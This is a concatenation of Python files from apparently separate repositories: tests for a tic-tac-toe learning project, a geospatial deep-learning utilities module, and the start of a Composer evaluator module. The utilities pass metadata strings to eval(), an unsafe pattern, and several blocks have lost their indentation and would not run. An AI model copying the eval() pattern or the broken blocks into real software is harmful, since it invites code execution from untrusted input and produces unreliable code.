    """moving_average yields len(vals)-n+1 points, or nothing when the window is too big."""
    result = moving_average(vals, n=n)
    window_count = (len(vals) - (n - 1)) if n < len(vals) else 0
    assert len(result) == window_count
    assert np.array_equal(result, np.array(expected))
def test_moving_average_invalid_n():
    """A non-positive window size is rejected with a ValueError."""
    with pytest.raises(ValueError):
        moving_average([1, 2, 3], 0)
@pytest.mark.skip(reason='side effects')
def test_play_game():
    # Placeholder: play_game has side effects (plays full games), so it is
    # intentionally not unit-tested here.
    pass


@pytest.mark.skip(reason='side effects')
def test_play_round_of_games():
    # Placeholder: exercises multiple games with side effects; skipped.
    pass


@pytest.mark.skip(reason='side effects')
def test_replay_loss():
    # Placeholder: replays lost games with side effects; skipped.
    pass
def test_state_to_actions():
    """state_to_actions lists every empty square as an available action."""
    board = (0, 1, -1, 1, 0, -1, -1, 1, 0)
    actions = state_to_actions(board, Game.ind_to_loc, Game.empty_marker)
    # The empty squares are the main diagonal of this board.
    assert set(actions) == {(0, 0), (1, 1), (2, 2)}
def test_check_states():
    """check_states should return all 12 symmetry-equivalent states (6 board
    transforms x 2 marker swaps) together with the transform descriptors."""
    # arrange
    state = np.reshape((0, 1, -1, 0, 0, -1, -1, 1, 1), Game.board_shape)
    expected_count = 12
    # The six board symmetries: identity, three rotations, two flips.
    expected_transforms = [
        {'func': None, 'args': {}},
        {'func': np.rot90, 'args': {'k': 1}},
        {'func': np.rot90, 'args': {'k': 2}},
        {'func': np.rot90, 'args': {'k': 3}},
        {'func': np.fliplr, 'args': {}},
        {'func': np.flipud, 'args': {}}
    ]
    # All twelve equivalent flattened states (transforms of the board and of
    # the marker-inverted board).
    expected_states = {
        (0, 1, -1, 0, 0, -1, -1, 1, 1),
        (-1, -1, 1, 1, 0, 1, 0, 0, -1),
        (1, 1, -1, -1, 0, 0, -1, 1, 0),
        (-1, 0, 0, 1, 0, 1, 1, -1, -1),
        (-1, 1, 0, -1, 0, 0, 1, 1, -1),
        (-1, 1, 1, 0, 0, -1, 0, 1, -1),
        (0, -1, 1, 0, 0, 1, 1, -1, -1),
        (1, 1, -1, -1, 0, -1, 0, 0, 1),
        (-1, -1, 1, 1, 0, 0, 1, -1, 0),
        (1, 0, 0, -1, 0, -1, -1, 1, 1),
        (1, -1, 0, 1, 0, 0, -1, -1, 1),
        (1, -1, -1, 0, 0, 1, 0, -1, 1)
    }
    # act
    states, transforms = check_states(state)
    # assert
    assert len(states) == expected_count
    assert len(transforms) == expected_count
    assert set(states) == expected_states
    assert all([t in transforms for t in expected_transforms])
def test_state_transforms():
    """state_transforms should return the six symmetry-transformed states of a
    board (identity, rotations by 90/180/270, horizontal and vertical flips)."""
    # arrange
    state = (0, 1, -1, 0, 0, -1, -1, 1, 1)
    expected_count = 6
    # One descriptor per board symmetry.
    expected_transforms = [
        {'func': None, 'args': {}},
        {'func': np.rot90, 'args': {'k': 1}},
        {'func': np.rot90, 'args': {'k': 2}},
        {'func': np.rot90, 'args': {'k': 3}},
        {'func': np.fliplr, 'args': {}},
        {'func': np.flipud, 'args': {}}
    ]
    # The six transformed flattened boards.
    expected_states = {
        (0, 1, -1, 0, 0, -1, -1, 1, 1),
        (-1, -1, 1, 1, 0, 1, 0, 0, -1),
        (1, 1, -1, -1, 0, 0, -1, 1, 0),
        (-1, 0, 0, 1, 0, 1, 1, -1, -1),
        (-1, 1, 0, -1, 0, 0, 1, 1, -1),
        (-1, 1, 1, 0, 0, -1, 0, 1, -1)
    }
    # act
    states, transforms = state_transforms(state)
    # assert
    assert len(states) == expected_count
    assert len(transforms) == expected_count
    assert set(states) == expected_states
    assert all([t in transforms for t in expected_transforms])
def test_reverse_transform():
    """reverse_transforms must relocate action values through the inverse
    transform without altering the set of values."""
    # arrange
    action_values = {
        (0, 0): 0,
        (0, 1): 0.1,
        (0, 2): 0.2,
        (1, 0): 0.3,
        (1, 1): 0.4,
        (1, 2): 0.5,  # fixed: was a duplicate (2, 2) key, which silently dropped this entry
        (2, 0): 0.6,
        (2, 1): 0.7,
        (2, 2): 0.8
    }
    transform = {'func': np.fliplr, 'args': {}}
    expected_values = [action_values[act] for act in action_values]
    # act
    adj_values = reverse_transforms(action_values, transform, Game.ind_to_loc)
    values = [adj_values[act] for act in adj_values]
    # assert (debug print removed)
    assert len(adj_values) == len(action_values)
    assert set(values) == set(expected_values)
@pytest.mark.parametrize(
    "loc, func, func_args, expected_loc",
    [
        pytest.param((0, 1), None, {}, (0, 1), id="none"),
        pytest.param((0, 1), np.rot90, {'k': -1}, (1, 2), id="rot90"),
        pytest.param((0, 1), np.rot90, {'k': -2}, (2, 1), id="rot180"),
        pytest.param((0, 1), np.rot90, {'k': -3}, (1, 0), id="rot270"),
        pytest.param((0, 1), np.fliplr, {}, (0, 1), id="fliplr"),
        pytest.param((0, 1), np.flipud, {}, (2, 1), id="flipud"),
    ],
)
def test_reverse_function(loc, func, func_args, expected_loc):
    """reverse_function maps a board location back through the inverse transform."""
    assert reverse_function(loc, Game.ind_to_loc, func, func_args) == expected_loc
def test_value_frequencies():
    """value_frequencies reports the relative frequency of every distinct value."""
    values = [1, 0, 0, 0, -1, -1, 1, -1, 0, 0]
    distinct = set(np.unique(values))

    freqs = value_frequencies(values)

    assert len(freqs) == len(distinct)
    assert set(freqs) == distinct
    for value, frequency in {0: 0.5, 1: 0.2, -1: 0.3}.items():
        assert freqs[value] == frequency
@pytest.mark.parametrize(
    "vals, n, expected",
    [
        # Window larger than the data: every value gets an empty series.
        pytest.param([1, 0, 0, 0, -1, -1, 1, -1, 0, 0], 20,
                     {0: [], 1: [], -1: []}, id="n>len(vals)"),
        # Window of 5 over 10 values: six overlapping windows per value.
        pytest.param([1, 0, 0, 0, -1, -1, 1, -1, 0, 0], 5,
                     {0: [0.6, 0.6, 0.4, 0.2, 0.2, 0.4],
                      1: [0.2, 0.0, 0.2, 0.2, 0.2, 0.2],
                      -1: [0.2, 0.4, 0.4, 0.6, 0.6, 0.4]}, id="normal"),
    ],
)
def test_moving_value_frequencies(vals, n, expected):
    """moving_value_frequencies returns one frequency series per distinct value."""
    # arrange
    expected_value_count = len(set(np.unique(vals)))
    # act
    freqs = moving_value_frequencies(vals, n=n)
    # assert
    assert len(freqs) == expected_value_count
    for v in expected:
        assert expected[v] == freqs[v]
def test_moving_value_frequencies_invalid_n():
    """A negative window size is rejected with a ValueError."""
    with pytest.raises(ValueError):
        moving_value_frequencies([1, 2, 3], -1)
@pytest.mark.skip(reason='plotting helper')
def test_plot_outcome_frequencies():
    # Placeholder: plotting helpers are not unit-tested.
    # Fix: removed a stray trailing "|" token after `pass` that broke parsing.
    pass
<reponame>remtav/SpaceNet7_Multi-Temporal_Solutions
import csv
import logging
import numbers
import subprocess
from pathlib import Path
from typing import Sequence, List
import torch
# import torch should be first. Unclear issue, mentioned here: https://github.com/pytorch/pytorch/issues/2083
from torch import nn
import numpy as np
import scipy.signal
import warnings
import requests
import collections
# These two import statements prevent exception when using eval(metadata) in SegmentationDataset()'s __init__()
from rasterio.crs import CRS
from affine import Affine
from utils.readers import read_parameters
from urllib.parse import urlparse
try:
from ruamel_yaml import YAML
except ImportError:
from ruamel.yaml import YAML
try:
from pynvml import *
except ModuleNotFoundError:
warnings.warn(f"The python Nvidia management library could not be imported. Ignore if running on CPU only.")
try:
import boto3
except ModuleNotFoundError:
warnings.warn('The boto3 library counldn\'t be imported. Ignore if not using AWS s3 buckets', ImportWarning)
pass
logging.getLogger(__name__)
class Interpolate(torch.nn.Module):
    """Module wrapper around ``torch.nn.functional.interpolate``.

    :param mode: interpolation algorithm (e.g. 'nearest', 'bilinear')
    :param scale_factor: multiplier for the spatial dimensions
    """

    # Modes for which F.interpolate accepts the align_corners argument;
    # passing it for any other mode (e.g. 'nearest') raises a ValueError.
    _ALIGN_CORNERS_MODES = ('linear', 'bilinear', 'bicubic', 'trilinear')

    def __init__(self, mode, scale_factor):
        super(Interpolate, self).__init__()
        self.interp = torch.nn.functional.interpolate
        self.scale_factor = scale_factor
        self.mode = mode

    def forward(self, x):
        # Fix: align_corners was hard-coded to False, which made 'nearest'
        # mode raise. Only pass it for the interpolating modes.
        align_corners = False if self.mode in self._ALIGN_CORNERS_MODES else None
        return self.interp(x, scale_factor=self.scale_factor, mode=self.mode,
                           align_corners=align_corners)
def load_from_checkpoint(checkpoint, model, optimizer=None, inference: str = ''):
    """Load weights from a previous checkpoint.

    Args:
        checkpoint: (dict) checkpoint with a 'model' (and optionally 'optimizer') state dict
        model: model to replace
        optimizer: optimiser to be used
        inference: (str) path to inference state_dict. If given, loading will be strict (see pytorch doc)

    Returns:
        (model, optimizer) with the loaded state.
    """
    # Corrects exception with test loop. Problem with loading generic checkpoint into DataParallel model
    # https://github.com/bearpaw/pytorch-classification/issues/27
    # https://discuss.pytorch.org/t/solved-keyerror-unexpected-key-module-encoder-embedding-weight-in-state-dict/1686/3
    if isinstance(model, nn.DataParallel) and not list(checkpoint['model'].keys())[0].startswith('module'):
        # Prefix every key with 'module.' so the state dict matches the DataParallel wrapper.
        new_state_dict = model.state_dict().copy()
        new_state_dict['model'] = {'module.' + k: v for k, v in checkpoint['model'].items()}  # Very flimsy
        del checkpoint
        checkpoint = {'model': new_state_dict['model']}
    strict_loading = bool(inference)  # strict only when an inference state dict path is given
    model.load_state_dict(checkpoint['model'], strict=strict_loading)
    logging.info("=> loaded model\n")
    if optimizer and 'optimizer' in checkpoint.keys():  # 2nd condition if loading a model without optimizer
        # Fix: torch.optim.Optimizer.load_state_dict() takes no `strict`
        # keyword; passing it raised a TypeError.
        optimizer.load_state_dict(checkpoint['optimizer'])
    return model, optimizer
def list_s3_subfolders(bucket, data_path):
    """List the names of the immediate sub-folders of *data_path* in an s3 bucket.

    :param bucket: (str) s3 bucket name
    :param data_path: (str) prefix (folder) to list under
    :return: (list of str) sub-folder names, excluding *data_path* itself
    """
    list_classes = []
    client = boto3.client('s3')
    result = client.list_objects(Bucket=bucket, Prefix=data_path + '/', Delimiter='/')
    for p in result.get('CommonPrefixes'):
        folder = p['Prefix'].split('/')[-2]
        # Fix: compare string values with != — the original used `is not`,
        # an identity check that is unreliable for strings.
        if folder != data_path:
            list_classes.append(folder)
    return list_classes
def get_device_ids(number_requested: int,
                   max_used_ram_perc: int = 25,
                   max_used_perc: int = 15):
    """
    Function to check which GPU devices are available and unused.

    :param number_requested: (int) Number of devices requested.
    :param max_used_ram_perc: (int) If RAM usage of detected GPU exceeds this percentage, it will be ignored
    :param max_used_perc: (int) If GPU's usage exceeds this percentage, it will be ignored
    :return: (dict) Unused GPU devices, mapping device index -> {'used_ram_at_init', 'max_ram'}.
        Empty when no GPUs are requested or none are available.
    """
    lst_free_devices = {}
    # Early exits: nothing requested, or no CUDA runtime at all -> run on CPU.
    if not number_requested:
        logging.warning(f'No GPUs requested. This training will run on CPU')
        return lst_free_devices
    if not torch.cuda.is_available():
        logging.error(f'Requested {number_requested} GPUs, but no CUDA devices found. This training will run on CPU')
        return lst_free_devices
    try:
        nvmlInit()
        if number_requested > 0:
            device_count = nvmlDeviceGetCount()
            for i in range(device_count):
                # res.gpu is utilization %, mem is in bytes (converted to MiB below).
                res, mem = gpu_stats(i)
                used_ram = mem.used / (1024 ** 2)
                max_ram = mem.total / (1024 ** 2)
                used_ram_perc = used_ram / max_ram * 100
                logging.debug(f'GPU RAM used: {used_ram_perc} ({used_ram:.0f}/{max_ram:.0f} MiB)\nGPU % used: {res.gpu}')
                # A device is "free" only if both its RAM and utilization are
                # below the user-provided thresholds.
                if used_ram_perc < max_used_ram_perc:
                    if res.gpu < max_used_perc:
                        lst_free_devices[i] = {'used_ram_at_init': used_ram, 'max_ram': max_ram}
                    else:
                        logging.warning(f'Gpu #{i} filtered out based on usage % threshold.\n'
                                        f'Current % usage: {res.gpu}\n'
                                        f'Max % usage allowed by user: {max_used_perc}.')
                else:
                    logging.warning(f'Gpu #{i} filtered out based on RAM threshold.\n'
                                    f'Current RAM usage: {used_ram}/{max_ram}\n'
                                    f'Max used RAM allowed by user: {max_used_ram_perc}.')
                # Stop scanning as soon as enough free devices are found.
                if len(lst_free_devices.keys()) == number_requested:
                    break
            if len(lst_free_devices.keys()) < number_requested:
                logging.warning(f"You requested {number_requested} devices. {device_count} devices are available and "
                                f"other processes are using {device_count-len(lst_free_devices.keys())} device(s).")
        else:
            # NOTE(review): only reachable for negative number_requested, since
            # falsy values return above — confirm this branch is intentional.
            logging.error('No gpu devices requested. Will run on cpu')
    except NameError as error:
        # pynvml failed to import at module load; its names are undefined here.
        raise NameError(f"{error}. Make sure that the NVIDIA management library (pynvml) is installed and running.")
    except NVMLError as error:
        raise ValueError(f"{error}. Make sure that the latest NVIDIA driver is installed and running.")
    return lst_free_devices
def gpu_stats(device=0):
    """
    Provides GPU utilization (%) and RAM usage for one device.

    :param device: (int) GPU index to query
    :return: (utilization, memory) as returned by pynvml — use res.gpu and res.memory
    """
    nvmlInit()
    dev_handle = nvmlDeviceGetHandleByIndex(device)
    utilization = nvmlDeviceGetUtilizationRates(dev_handle)
    memory = nvmlDeviceGetMemoryInfo(dev_handle)
    return utilization, memory
def get_key_def(key, config, default=None, msg=None, delete=False, expected_type=None):
    """Returns a value given a dictionary key, or the default value if it cannot be found.

    :param key: key in dictionary (e.g. generated from .yaml); may be a list of
        candidate keys, in which case the first one present in *config* wins
    :param config: (dict) dictionary containing keys corresponding to parameters used in script
    :param default: default value assigned if no value found with provided key
    :param msg: message for the AssertionError raised when a key list has length <= 1
    :param delete: (bool) if True, deletes parameter, e.g. for one-time use.
    :param expected_type: if given, assert the found value has this type
    :return: the configured value, or *default*
    """
    if not config:
        return default
    if isinstance(key, list):  # key is a list of candidate keys
        if len(key) <= 1:
            raise AssertionError(msg if msg is not None
                                 else "Must provide at least two valid keys to test")
        # Fix: the original overwrote any found value with `default` after the
        # loop; now the first matching key wins and default is the fallback.
        val = default
        for k in key:
            if k in config:
                val = config[k]
                if delete:  # optionally delete parameter after defining a variable with it
                    del config[k]
                break
    else:  # key is a single key
        if key not in config or config[key] is None:
            val = default
        else:
            # The literal string 'None' in a yaml is treated as Python None.
            val = config[key] if config[key] != 'None' else None
            if expected_type and val is not False:
                assert isinstance(val, expected_type), f"{val} is of type {type(val)}, expected {expected_type}"
            if delete:
                del config[key]
    return val
def minmax_scale(img, scale_range=(0, 1), orig_range=(0, 255)):
    """
    Rescale image values from ``orig_range`` into ``scale_range``.

    :param img: (numpy array) image to be scaled
    :param scale_range: desired range of transformed data, (0, 1) or (-1, 1)
    :param orig_range: original range of the input data
    :return: (numpy array) scaled image as float32
    """
    assert scale_range == (0, 1) or scale_range == (-1, 1), 'expects scale_range as (0, 1) or (-1, 1)'
    shifted = img.astype(np.float32) - orig_range[0]
    span = orig_range[1] - orig_range[0]
    if scale_range == (0, 1):
        return shifted / span
    # (-1, 1): map the normalized values onto a symmetric range.
    return 2.0 * shifted / span - 1.0
def unscale(img, float_range=(0, 1), orig_range=(0, 255)):
    """
    Map values from a float range (0, 1) or (-1, 1) back to the original range.

    :param img: (numpy array) image to be unscaled
    :param float_range: (0, 1) or (-1, 1)
    :param orig_range: (0, 255) or (0, 65535)
    :return: (numpy array) unscaled image
    """
    float_span = float_range[1] - float_range[0]
    orig_span = orig_range[1] - orig_range[0]
    return orig_span * (img - float_range[0]) / float_span + orig_range[0]
def pad(img, padding, fill=0):
    r"""Pad the given ndarray on all sides with a constant fill value.

    Adapted from https://github.com/pytorch/vision/blob/master/torchvision/transforms/functional.py#L255

    Args:
        img (ndarray): image to be padded (2-D grayscale or 3-D RGB).
        padding (int or tuple): a single int pads all borders; a 2-tuple is
            (left/right, top/bottom); a 4-tuple is (left, top, right, bottom).
        fill: constant pixel fill value (default 0).

    Returns:
        ndarray: padded image (unchanged if it is neither 2-D nor 3-D).
    """
    if not isinstance(padding, (numbers.Number, tuple)):
        raise TypeError('Got inappropriate padding arg')
    if not isinstance(fill, (numbers.Number, str, tuple)):
        raise TypeError('Got inappropriate fill arg')
    if isinstance(padding, Sequence) and len(padding) not in [2, 4]:
        raise ValueError("Padding must be an int or a 2, or 4 element tuple, not a " +
                         "{} element tuple".format(len(padding)))

    # Normalize every accepted form to explicit (left, top, right, bottom).
    if isinstance(padding, int):
        left = top = right = bottom = padding
    if isinstance(padding, Sequence) and len(padding) == 2:
        left = right = padding[0]
        top = bottom = padding[1]
    if isinstance(padding, Sequence) and len(padding) == 4:
        left, top, right, bottom = padding

    pad_width = ((top, bottom), (left, right))
    if len(img.shape) == 3:
        # RGB image: do not pad the channel axis.
        return np.pad(img, pad_width + ((0, 0),), mode='constant', constant_values=fill)
    if len(img.shape) == 2:
        # Grayscale image.
        return np.pad(img, pad_width, mode='constant', constant_values=fill)
    return img
def pad_diff(actual_height, actual_width, desired_height, desired_width):
    """Return a (left, top, right, bottom) padding tuple that grows an image
    smaller than the sample size up to the desired dimensions."""
    return 0, 0, desired_width - actual_width, desired_height - actual_height
def unnormalize(input_img, mean, std):
    """
    Invert a mean/std normalization: ``x * std + mean``.

    :param input_img: (numpy array) image to be "unnormalized"
    :param mean: per-channel mean values
    :param std: per-channel std values
    :return: (numpy array) "unnormalized" image
    """
    return input_img * std + mean
def BGR_to_RGB(array):
    """Swap the first three channels of *array* from BGR to RGB order, in place.

    Channels beyond the third (e.g. NIR) are left untouched.

    :param array: ndarray with at least 3 channels on the last axis
    :return: the same array, mutated
    """
    assert array.shape[2] >= 3, f"Not enough channels in array of shape {array.shape}"
    # 2::-1 reverses only channels [0, 1, 2]; copy first to avoid aliasing.
    array[:, :, :3] = np.ascontiguousarray(array[..., 2::-1])
    return array
def ind2rgb(arr, color):
    """
    Colour-map a 2-D index image to an RGB image.

    :param arr: (numpy array) 2-D array of class indices
    :param color: (dict) class index -> RGB colour triple
    :return: (numpy array) uint8 RGB image of shape (h, w, 3)
    """
    height, width = arr.shape
    rgb = np.empty((height, width, 3), dtype=np.uint8)
    for cls_index, cls_color in color.items():
        mask = arr == cls_index
        for channel in range(3):
            rgb[..., channel][mask] = cls_color[channel]
    return rgb
def is_url(url):
    """Return True when *url* has an http, https or s3 scheme."""
    return urlparse(url).scheme in ('http', 'https', 's3')
def checkpoint_url_download(url: str):
    """Download a checkpoint archive from *url* into ./inference_out.

    The URL's content-type must be one of the recognised tar/compress MIME
    types; otherwise the process exits.

    :param url: direct link to a checkpoint archive
    :return: (Path) local path of the downloaded checkpoint
    :raises SystemExit: on request failure or unrecognised content type
    """
    # Fix: 'applicaton/x-gtar' was misspelled, so gtar archives never matched.
    mime_type = ('application/tar', 'application/x-tar', 'application/x-gtar',
                 'multipart/x-tar', 'application/x-compress', 'application/x-compressed')
    try:
        response = requests.head(url)
        if response.headers['content-type'] in mime_type:
            working_folder = Path.cwd().joinpath('inference_out')
            Path.mkdir(working_folder, parents=True, exist_ok=True)
            checkpoint_path = working_folder.joinpath(Path(url).name)
            r = requests.get(url)
            checkpoint_path.write_bytes(r.content)
            print(checkpoint_path)
            return checkpoint_path
        else:
            raise SystemExit('Invalid Url, checkpoint content not detected')
    except requests.exceptions.RequestException as e:
        raise SystemExit(e)
def list_input_images(img_dir_or_csv: str,
                      bucket_name: str = None,
                      glob_patterns: List = None):
    """
    Create list of images from given directory, csv file, single file or URL.

    :param img_dir_or_csv: (str) directory containing input images, a csv with a list
        of images, a single image path, or a URL
    :param bucket_name: (str, optional) name of aws s3 bucket
    :param glob_patterns: (list of str) if a directory is given as input (not csv), these
        are the glob patterns used to find desired images
    :return: list of dictionaries where keys are "tif" and values are paths to found
        images. A "meta" key is also added if input is csv and the second column
        contains a metadata file; then its value is the path to that metadata file.
    """
    if bucket_name:
        s3 = boto3.resource('s3')
        bucket = s3.Bucket(bucket_name)
        if img_dir_or_csv.endswith('.csv'):
            bucket.download_file(img_dir_or_csv, 'img_csv_file.csv')
            list_img = read_csv('img_csv_file.csv')
        else:
            raise NotImplementedError(
                'Specify a csv file containing images for inference. Directory input not implemented yet')
    else:
        if img_dir_or_csv.endswith('.csv'):
            list_img = read_csv(img_dir_or_csv)
        elif is_url(img_dir_or_csv):
            # Single remote image: wrap the URL in the expected dict shape.
            list_img = []
            img_path = Path(img_dir_or_csv)
            img = {}
            img['tif'] = img_path
            list_img.append(img)
        else:
            img_dir = Path(img_dir_or_csv)
            assert img_dir.is_dir() or img_dir.is_file(), f'Could not find directory/file "{img_dir_or_csv}"'
            list_img_paths = set()
            if img_dir.is_dir():
                for glob_pattern in glob_patterns:
                    assert isinstance(glob_pattern, str), f'Invalid glob pattern: "{glob_pattern}"'
                    list_img_paths.update(sorted(img_dir.glob(glob_pattern)))
            else:
                # Fix: set.update(Path) raised TypeError (Path is not iterable);
                # a single file must be add()-ed to the set.
                list_img_paths.add(img_dir)
            list_img = []
            for img_path in list_img_paths:
                img = {}
                img['tif'] = img_path
                list_img.append(img)
            # Fix: the original `>= 0` assertion was vacuously true; the error
            # message shows an empty result was meant to fail.
            assert len(list_img) >= 1, f'No .tif files found in {img_dir_or_csv}'
    return list_img
def read_csv(csv_file_name):
    """
    Open csv file and parse it, returning a list of dict with keys:
    - tif full path
    - metadata yml full path (may be empty string if unavailable)
    - gpkg full path
    - attribute_name
    - dataset (trn or tst)
    """
    list_values = []
    with open(csv_file_name, 'r') as f:
        for index, row in enumerate(csv.reader(f)):
            # All rows must have the same number of columns as the first one.
            row_length = len(row) if index == 0 else row_length
            assert len(row) == row_length, "Rows in csv should be of same length"
            row.extend([None] * (5 - len(row)))  # pad with None up to 5 columns
            entry = {'tif': row[0], 'meta': row[1], 'gpkg': row[2],
                     'attribute_name': row[3], 'dataset': row[4]}
            list_values.append(entry)
            assert Path(row[0]).is_file(), f'Tif raster not found "{row[0]}"'
            if row[2]:
                assert Path(row[2]).is_file(), f'Gpkg not found "{row[2]}"'
                assert isinstance(row[3], str)
    try:
        # Try sorting according to dataset name (i.e. group "train", "val" and "test" rows together)
        return sorted(list_values, key=lambda entry: entry['dataset'])
    except TypeError:
        logging.warning('Unable to sort csv rows')
        return list_values
def add_metadata_from_raster_to_sample(sat_img_arr: np.ndarray,
                                       raster_handle: dict,
                                       meta_map: dict,
                                       raster_info: dict
                                       ) -> dict:
    """
    :param sat_img_arr: source image as array (opened with rasterio.read)
    :param raster_handle: opened rasterio dataset; provides .name and .meta
    :param meta_map: meta map parameter from yaml (global section)
    :param raster_info: info from raster as read with read_csv (except at inference)
    :return: Returns a metadata dictionary populated with info from source raster, including original csv line and
        histogram.
    """
    metadata_dict = {'name': raster_handle.name, 'csv_info': raster_info, 'source_raster_bincount': {}}
    assert 'dtype' in raster_handle.meta.keys(), "\"dtype\" could not be found in source image metadata"
    metadata_dict.update(raster_handle.meta)
    if not metadata_dict['dtype'] in ["uint8", "uint16"]:
        warnings.warn(f"Datatype should be \"uint8\" or \"uint16\". Got \"{metadata_dict['dtype']}\". ")
        # Override the declared dtype based on the actual value range of the array.
        if sat_img_arr.min() >= 0 and sat_img_arr.max() <= 255:
            metadata_dict['dtype'] = "uint8"
        elif sat_img_arr.min() >= 0 and sat_img_arr.max() <= 65535:
            metadata_dict['dtype'] = "uint16"
        else:
            raise NotImplementedError(f"Min and max values of array ({[sat_img_arr.min(), sat_img_arr.max()]}) "
                                      f"are not contained in 8 bit nor 16 bit range. Datatype cannot be overwritten.")
    # Save bin count (i.e. histogram) to metadata
    assert isinstance(sat_img_arr, np.ndarray) and len(sat_img_arr.shape) == 3, f"Array should be 3-dimensional"
    for band_index in range(sat_img_arr.shape[2]):
        band = sat_img_arr[..., band_index]
        # NOTE(review): this is a SET comprehension — duplicate counts collapse
        # and bin order is lost, so this is not a usable histogram as the
        # comment above claims. Confirm whether a list was intended.
        metadata_dict['source_raster_bincount'][f'band{band_index}'] = {count for count in np.bincount(band.flatten())}
    if meta_map and Path(raster_info['meta']).is_file():
        # NOTE(review): `not X is not None` reads as "X is None", which can
        # never be true here since Path(raster_info['meta']).is_file() passed —
        # confirm the intended condition.
        if not raster_info['meta'] is not None and isinstance(raster_info['meta'], str):
            raise ValueError("global configuration requested metadata mapping onto loaded "
                             "samples, but raster did not have available metadata")
        yaml_metadata = read_parameters(raster_info['meta'])
        metadata_dict.update(yaml_metadata)
    return metadata_dict
#### Image Patches Smoothing Functions ####
""" Adapted from : https://github.com/Vooban/Smoothly-Blend-Image-Patches """
def _spline_window(window_size, power=2):
"""
Squared spline (power=2) window function:
https://www.wolframalpha.com/input/?i=y%3Dx**2,+y%3D-(x-2)**2+%2B2,+y%3D(x-4)**2,+from+y+%3D+0+to+2
"""
intersection = int(window_size/4)
wind_outer = (abs(2*(scipy.signal.triang(window_size))) ** power)/2
wind_outer[intersection:-intersection] = 0
wind_inner = 1 - (abs(2*(scipy.signal.triang(window_size) - 1)) ** power)/2
wind_inner[:intersection] = 0
wind_inner[-intersection:] = 0
wind = wind_inner + wind_outer
wind = wind / np.average(wind)
return wind
# Memoization cache for _window_2D, keyed by "<window_size>_<power>".
cached_2d_windows = dict()


def _window_2D(window_size, power=2):
    """
    Make a 1D window function, then infer and return a 2D window function.
    Done with an augmentation, and self multiplication with its transpose.
    Could be generalized to more dimensions.
    """
    global cached_2d_windows
    key = "{}_{}".format(window_size, power)
    cached = cached_2d_windows.get(key)
    if cached is not None:
        return cached
    window_1d = _spline_window(window_size, power)
    window_1d = np.expand_dims(np.expand_dims(window_1d, 1), -1)
    # Outer product of the 1-D window with itself -> (size, size, 1) 2-D window.
    window_2d = window_1d * window_1d.transpose(1, 0, 2)
    cached_2d_windows[key] = window_2d
    return window_2d
def get_git_hash():
    """
    Get git hash during execution of python script.

    :return: (str) short hash of the current geo-deep-learning commit, or None when
        the code is not run from a git repository. If necessary, the code associated
        to this hash can be found at https://github.com/<owner>/<project>/commit/<hash>,
        aka https://github.com/NRCan/geo-deep-learning/commit/<hash>
    """
    completed = subprocess.run('git rev-parse --short HEAD', shell=True,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # When the code is not executed from a git repo, git exits with code 128.
    # Reference: https://stackoverflow.com/questions/58575970/subprocess-call-with-exit-status-128
    if completed.returncode == 128:
        logging.warning(f'No git repo associated to this code.')
        return None
    return str(completed.stdout, "utf-8").replace("\n", "")
def ordereddict_eval(str_to_eval: str):
    """
    Small utility to successfully evaluate an ordereddict object that was converted to str by repr() function.

    :param str_to_eval: (str or bytes) string to be prepared for import with eval()
    :return: the evaluated object, or the (possibly transformed) input string on failure
    """
    text = str_to_eval
    try:
        if isinstance(text, bytes):
            text = text.decode('UTF-8')
        # repr() of an OrderedDict may print "ordereddict"; map it to the importable name.
        text = text.replace("ordereddict", "collections.OrderedDict")
        return eval(text)
    except Exception:
        logging.exception(f'Object of type \"{type(text)}\" cannot not be evaluated. Problems may occur.')
        return text
def compare_config_yamls(yaml1: dict, yaml2: dict, update_yaml1: bool = False) -> List:
    """
    Checks if values for same keys or subkeys (max depth of 2) of two dictionaries match.

    :param yaml1: (dict) first dict to evaluate (e.g. the current config)
    :param yaml2: (dict) second dict to evaluate (e.g. the yaml stored with the HDF5 samples)
    :param update_yaml1: (bool) if True, values in yaml1 will be replaced with values in yaml2,
                         if the latters are different
    :return: NOTE(review): despite the List annotation, no value is returned
        (implicitly None); mismatches are only logged as warnings — confirm
        whether a list of mismatched keys was intended.
    """
    if not (isinstance(yaml1, dict) or isinstance(yaml2, dict)):
        raise TypeError(f"Expected both yamls to be dictionaries. \n"
                        f"Yaml1's type is {type(yaml1)}\n"
                        f"Yaml2's type is {type(yaml2)}")
    for section, params in yaml2.items():  # loop through main sections of config yaml ('global', 'sample', etc.)
        if section not in yaml1.keys():  # create key if not in dictionary as we loop
            yaml1[section] = {}
        for param, val2 in params.items():  # loop through parameters of each section ('samples_size','debug_mode',...)
            if param not in yaml1[section].keys():  # create key if not in dictionary as we loop
                yaml1[section][param] = {}
            # set to None if no value for that key
            val1 = get_key_def(param, yaml1[section], default=None)
            if isinstance(val2, dict):  # if value is a dict, loop again to fetch end val (only recursive twice)
                for subparam, subval2 in val2.items():
                    if subparam not in yaml1[section][param].keys():  # create key if not in dictionary as we loop
                        yaml1[section][param][subparam] = {}
                    # set to None if no value for that key
                    subval1 = get_key_def(subparam, yaml1[section][param], default=None)
                    if subval2 != subval1:
                        # if value doesn't match between yamls, emit warning
                        logging.warning(f"YAML value mismatch: section \"{section}\", key \"{param}/{subparam}\"\n"
                                        f"Current yaml value: \"{subval1}\"\nHDF5s yaml value: \"{subval2}\"\n")
                        if update_yaml1:  # update yaml1 with subvalue of yaml2
                            yaml1[section][param][subparam] = subval2
                            logging.info(f'Value in yaml1 updated')
            elif val2 != val1:
                # NOTE(review): here val2/val1 appear swapped relative to the
                # subparam branch — "Current yaml value" prints the HDF5 value
                # and vice versa. Confirm and align the two messages.
                logging.warning(f"YAML value mismatch: section \"{section}\", key \"{param}\"\n"
                                f"Current yaml value: \"{val2}\"\nHDF5s yaml value: \"{val1}\"\n"
                                f"Problems may occur.")
                if update_yaml1:  # update yaml1 with value of yaml2
                    yaml1[section][param] = val2
                    logging.info(f'Value in yaml1 updated')
|
<reponame>Landanjs/composer
# Copyright 2022 MosaicML Composer authors
# SPDX-License-Identifier: Apache-2.0
"""A wrapper for a dataloader to include metrics that apply to a specific dataset."""
from __future__ import annotations
import copy
from typing import Any, Callable, Dict, Iterable, Optional, Union
from torchmetrics import Metric, MetricCollection
from composer.core.data_spec import DataSpec, ensure_data_spec
from composer.core.event import Event
from composer.core.state import State
from composer.core.time import Time, TimeUnit
__all__ = ["Evaluator", "evaluate_periodically", "ensure_evaluator"]
def evaluate_periodically(eval_interval: Union[str, Time, int], eval_at_fit_end: bool = True):
    """Build the periodic-evaluation predicate used by :class:`.Evaluator`.

    Args:
